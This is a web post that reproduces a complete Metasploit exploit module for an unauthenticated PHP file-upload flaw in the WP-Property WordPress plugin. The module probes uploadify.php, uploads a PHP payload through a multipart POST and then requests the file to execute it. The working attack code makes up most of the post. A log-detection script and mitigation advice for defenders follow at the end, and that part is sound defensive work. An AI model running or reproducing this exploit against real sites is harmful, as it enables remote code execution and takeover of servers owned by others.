WordPress WP-Property PHP File Upload Vulnerability

Posted on 2013-1-4 19:51:30

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress WP-Property PHP File Upload Vulnerability',
      'Description'    => %q{
        This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress
        plugin. By abusing the uploadify.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82656' ],
          [ 'BID', '53787' ],
          [ 'EDB', '18987'],
          [ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Mar 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  def check
    uri =  target_uri.path
    uri << '/' if uri[-1,1] != '/'

    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
    })

    if not res or res.code != 200
      return Exploit::CheckCode::Unknown
    end

    return Exploit::CheckCode::Appears
  end

  def exploit
    uri =  target_uri.path
    uri << '/' if uri[-1,1] != '/'

    peer = "#{rhost}:#{rport}"

    @payload_name = "#{rand_text_alpha(5)}.php"
    php_payload = get_write_exec_payload(:unlink_self=>true)

    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
    data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{@payload_name}")
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => post_data
    })

    if not res or res.code != 200 or res.body !~ /#{@payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    upload_uri = res.body

    print_status("#{peer} - Executing payload #{@payload_name}")
    res = send_request_raw({
      'uri'    => upload_uri,
      'method' => 'GET'
    })
  end
end
Don't ask me what this is or how to use it. I'm talking about msf.
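For defenders, the module above leaves a recognisable trace in web server logs: a POST to uploadify.php answered with 200, then a GET by the same client for a new .php file in the same directory. The following detection sketch is an added example, not part of the original post or of Metasploit; it assumes Apache/Nginx combined log format, and the names `detect_uploadify_abuse`, `parse_line`, and the sample log lines are constructed for illustration.

```ruby
# Added example (not from the original post): flag upload-then-execute
# sequences against WP-Property's uploadify.php in combined-format access logs.
UPLOADIFY_DIR = 'wp-content/plugins/wp-property/third-party/uploadify/'
LOG_RE = /\A(?<ip>\S+) \S+ \S+ \[(?<ts>[^\]]+)\] "(?<method>[A-Z]+) (?<path>\S+) [^"]*" (?<status>\d{3}) /

# Constructed sample log lines (documentation IP ranges, made-up file name).
SAMPLE_LOG = <<~LOG
  198.51.100.7 - - [04/Jan/2013:19:40:01 +0800] "GET /wordpress/wp-content/plugins/wp-property/third-party/uploadify/uploadify.php HTTP/1.1" 200 0 "-" "-"
  198.51.100.7 - - [04/Jan/2013:19:40:02 +0800] "POST /wordpress/wp-content/plugins/wp-property/third-party/uploadify/uploadify.php HTTP/1.1" 200 71 "-" "-"
  198.51.100.7 - - [04/Jan/2013:19:40:03 +0800] "GET /wordpress/wp-content/plugins/wp-property/third-party/uploadify/AbCdE.php HTTP/1.1" 200 0 "-" "-"
  203.0.113.20 - - [04/Jan/2013:19:41:10 +0800] "GET /wordpress/index.php HTTP/1.1" 200 5120 "-" "-"
  203.0.113.9 - - [04/Jan/2013:19:42:00 +0800] "POST /wordpress/wp-content/plugins/wp-property/third-party/uploadify/uploadify.php HTTP/1.1" 404 0 "-" "-"
LOG

# Parse one combined-format line into a hash, or nil if it does not match.
def parse_line(line)
  m = LOG_RE.match(line)
  m && { ip: m[:ip], ts: m[:ts], method: m[:method],
         path: m[:path].split('?', 2).first, status: m[:status].to_i }
end

# Returns one finding per suspicious request:
#   :upload  - POST to uploadify.php answered with 200
#   :execute - later GET by the same client for another .php file in that directory
def detect_uploadify_abuse(lines)
  uploaders = {}
  findings = []
  lines.each do |line|
    e = parse_line(line) or next
    next unless e[:path].include?(UPLOADIFY_DIR)
    file = e[:path].split('/').last.to_s
    if e[:method] == 'POST' && file == 'uploadify.php' && e[:status] == 200
      uploaders[e[:ip]] = true
      findings << e.merge(kind: :upload)
    elsif e[:method] == 'GET' && file =~ /\.php\z/i && file != 'uploadify.php' && uploaders[e[:ip]]
      findings << e.merge(kind: :execute)
    end
  end
  findings
end

if __FILE__ == $PROGRAM_NAME
  detect_uploadify_abuse(SAMPLE_LOG.lines).each do |f|
    puts "#{f[:kind]} #{f[:ip]} #{f[:ts]} #{f[:path]} (#{f[:status]})"
  end
end
```

Because the `folder` form field is supplied in the request, an uploaded file may land outside this directory, so a 200 response to any POST on uploadify.php is the primary signal. On sites running WP-Property <= 1.35.0, removing or blocking the third-party/uploadify directory closes the unauthenticated upload path.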